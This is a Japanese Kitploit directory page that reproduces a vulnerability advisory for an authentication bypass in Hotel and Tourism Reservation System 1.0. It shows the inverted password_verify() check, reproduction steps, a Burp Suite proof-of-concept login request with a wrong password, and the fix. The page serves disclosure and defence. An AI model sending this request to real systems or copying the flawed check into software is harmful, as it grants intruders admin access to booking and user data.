Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-10288-AUTH-BYPASS | Kitploit
ツール/GitHubGitHub/xmyronn/cve-2026-10288-auth-bypass
脆弱性分析エクスプロイトウェブアプリケーション悪用ウェブセキュリティペネトレーションテスト認証
GitHubxmyronn/cve-2026-10288-auth-bypass

CVE-2026-10288-AUTH-BYPASS

リポジトリを見る
2ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Hotel and Tourism Reservation System - 認証バイパス

脆弱性の詳細

フィールド詳細
タイトルHotel and Tourism Reservation System - 認証バイパス
ベンダーcode-projects.org
製品Hotel and Tourism Reservation System
バージョン1.0
脆弱性タイプ不適切な認証
CWECWE-287
CVSSスコア9.0 (緊急)
CVSSベクターCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
影響を受けるファイル/admin/login.php
認証要件不要
リモートからの悪用可能

説明

Hotel and Tourism Reservation System 1.0 の管理者ログイン機能には、重大な認証バイパス脆弱性が存在します。この脆弱性は、password_verify() の戻り値に対する条件チェックが反転していることに起因し、誤ったパスワードが入力された場合にアクセスを許可し、正しいパスワードが入力された場合にアクセスを拒否します。認証されていないリモート攻撃者は、有効なメールアドレスと任意の誤ったパスワードを入力するだけで、完全な管理者アクセスを取得できます。


根本原因

ファイル: admin/login.php — 39〜46行目

root@kitploit:~
if(password_verify($password, $user['password'])){
    // BUG: password_verify() returns TRUE when password is CORRECT
    // but the error message is placed here instead of login logic
    echo '<div class="w3-text-red text-center">The password you entered was incorrect, please try again.</div>';
} else {
    // BUG: this block executes when password is WRONG
    // but login is granted here instead of showing an error
    $userID = $user['id'];
    login($userID);
}

password_verify() は、入力されたパスワードがハッシュと一致した場合に true を返します。開発者は成功時のロジックを else 分岐(関数が false を返した場合に実行される)内に配置したため、誤ったパスワードが入力されると認証が許可されてしまいます。


影響

リモートの認証されていない攻撃者は、以下を行うことができます:

  • アプリケーションへの完全な管理者アクセスの取得
  • すべての客室およびツアー予約の表示、変更、削除
  • 客室、ツアー、イベントの追加、編集、削除
  • 登録済みのすべてのユーザーデータへのアクセス
  • 管理者パスワードを知らなくてもすべての管理操作の実行

再現手順

セットアップ: XAMPP に Hotel and Tourism Reservation System 1.0 をインストールします。http://localhost/ht/ でアプリにアクセスします。

ステップ 1: 管理者ログインページに移動します。

http:///ht/admin/login.php

ステップ 2: 有効な管理者メールアドレスと任意の誤ったパスワードを入力します。

メール: [email protected] パスワード: wrongpassword

ステップ 3: ログイン をクリックします。

結果: アプリケーションは認証をバイパスし、管理者ダッシュボード (index.php) にリダイレクトされます。誤ったパスワードで完全な管理者アクセスが許可されます。


概念実証 (Burp Suite)

リクエスト:

root@kitploit:~
POST /ht/admin/login.php HTTP/1.1
Host: <target>
Content-Type: application/x-www-form-urlencoded

email=admin%40admin.com&password=test1234&login=Login

レスポンス:

root@kitploit:~
HTTP/1.1 302 Found
Location: index.php

index.php への 302 リダイレクトは、誤ったパスワードでの認証成功を裏付けています。


スクリーンショット

1. ログインページ — 誤ったパスワードの入力

Screenshot 2026-05-11 232154

2. Burp Suite — 302リダイレクトによるバイパスの確認

Screenshot 2026-05-11 232205

3. ソースコード — 反転したロジック

Screenshot 2026-05-11 232228

推奨される修正

password_verify() が true を返した場合にログインが許可されるよう、条件分岐を入れ替えます:

root@kitploit:~
// FIXED
if(password_verify($password, $user['password'])){
    $userID = $user['id'];
    login($userID);
} else {
    echo '<div class="w3-text-red text-center">The password you entered was incorrect, please try again.</div>';
}

参考

  • CWE-287: 不適切な認証
  • Hotel and Tourism Reservation System — code-projects.org

発見者

Imad Alvi — 独立系セキュリティ研究者

ツールをダウンロード